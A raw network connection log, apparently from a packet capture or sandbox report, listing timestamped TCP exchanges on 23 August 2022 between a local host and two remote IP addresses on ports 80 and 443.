Aug 23, 2022 03:42:49.888494968 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888530016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888571024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888575077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888591051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888608932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888622046 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888648987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888658047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888689041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888693094 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888727903 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888736010 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888767004 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888782024 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888808012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888816118 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888847113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888855934 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888886929 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888895035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888926983 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.888926983 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888967037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.888968945 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889008045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889019012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889079094 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889084101 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889118910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889120102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889158010 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889170885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889195919 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889198065 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889236927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889239073 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889277935 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889286995 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889317989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889321089 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889359951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889364958 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889400005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889410973 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889440060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889441967 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889480114 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889483929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889522076 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889533997 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889563084 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889563084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889602900 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889605999 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889643908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889653921 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889684916 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889684916 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889724016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889728069 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889765024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889775991 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889805079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889811993 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889842987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889849901 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889898062 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889909029 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889938116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.889941931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.889976978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890003920 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890016079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890054941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890086889 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890094995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890106916 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890136957 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890149117 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890176058 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890178919 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890216112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890225887 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890256882 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890260935 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890295029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890304089 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890335083 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890341043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890374899 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890386105 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890427113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890431881 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890472889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890486956 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890523911 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890532970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890578032 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890595913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890640974 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890657902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890719891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890722990 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890743017 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890764952 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890774012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890790939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890794039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890813112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890816927 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890832901 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890850067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890856028 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890868902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890883923 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890887976 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890896082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890906096 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890919924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890923977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890942097 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890955925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.890960932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890979052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.890995979 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.891001940 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.891015053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.891024113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.891032934 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.891045094 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.891050100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.891067982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.891073942 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.891086102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.891107082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.891130924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.917170048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.917208910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.917236090 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.917263985 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.917277098 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.917315960 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.917320967 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.917336941 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.917345047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.917373896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.917375088 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.917401075 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.917402029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.917429924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.917431116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.917442083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.917473078 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925121069 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925147057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925164938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925205946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925209999 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925221920 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925245047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925246954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925282001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925285101 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925393105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925420046 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925440073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925450087 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925465107 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925467014 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925479889 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925487995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925518990 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925530910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925533056 CEST	49777	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:49.925566912 CEST	443	49777	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:49.925642014 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925667048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925688028 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925689936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925709009 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925712109 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925724030 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925734997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925751925 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925751925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925770998 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925779104 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925789118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925796032 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925806999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925812960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925825119 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925829887 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925843000 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925849915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925860882 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925868034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925884008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925885916 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925904989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925904989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925920010 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925925016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.925940037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.925961971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926067114 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926095009 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926124096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926126003 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926143885 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926160097 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926186085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926218987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926243067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926268101 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926278114 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926285982 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926302910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926320076 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926336050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926342964 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926347971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926353931 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926368952 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926371098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926373959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926388979 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926405907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926412106 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926423073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926433086 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926440954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926457882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926465034 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926481009 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926485062 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926505089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926517010 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926532030 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926547050 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926789045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926808119 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926822901 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926840067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926845074 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926856995 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926857948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926881075 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926889896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926902056 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926913977 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926919937 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926929951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926942110 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926948071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926959991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926965952 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.926976919 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.926995039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927000999 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927006960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927027941 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927045107 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927571058 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927591085 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927609921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927633047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927649021 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927650928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927663088 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927673101 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927687883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927691936 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927709103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927711964 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927722931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927727938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927745104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927757978 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927761078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927776098 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927778959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927781105 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927784920 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927803993 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927810907 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927823067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927830935 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927840948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927856922 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927860975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927875042 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927884102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927898884 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927911043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927921057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927934885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927943945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.927949905 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927973986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.927994967 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:50.112809896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:50.113100052 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:50.535486937 CEST	49783	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:50.535551071 CEST	443	49783	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:50.535675049 CEST	49783	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:50.535990000 CEST	49783	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:50.536022902 CEST	443	49783	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:50.545871973 CEST	49776	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:50.570615053 CEST	443	49776	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:50.570688009 CEST	443	49776	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:50.570780993 CEST	49776	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:50.615684986 CEST	443	49783	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:50.615709066 CEST	49776	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:50.615747929 CEST	443	49776	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:50.616558075 CEST	49783	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:50.616589069 CEST	443	49783	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:50.617115021 CEST	443	49783	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:50.617717981 CEST	49783	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:50.617863894 CEST	443	49783	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:50.763479948 CEST	49783	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:51.922986031 CEST	49790	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:51.923023939 CEST	443	49790	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:51.923108101 CEST	49790	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:51.923808098 CEST	49790	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:51.923839092 CEST	443	49790	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:52.003463984 CEST	443	49790	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:52.003587961 CEST	49790	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:52.018666029 CEST	49790	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:52.018690109 CEST	443	49790	148.251.234.83	192.168.2.3
Aug 23, 2022 03:42:52.020962000 CEST	49790	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:42:52.020981073 CEST	443	49790	148.251.234.83	192.168.2.3
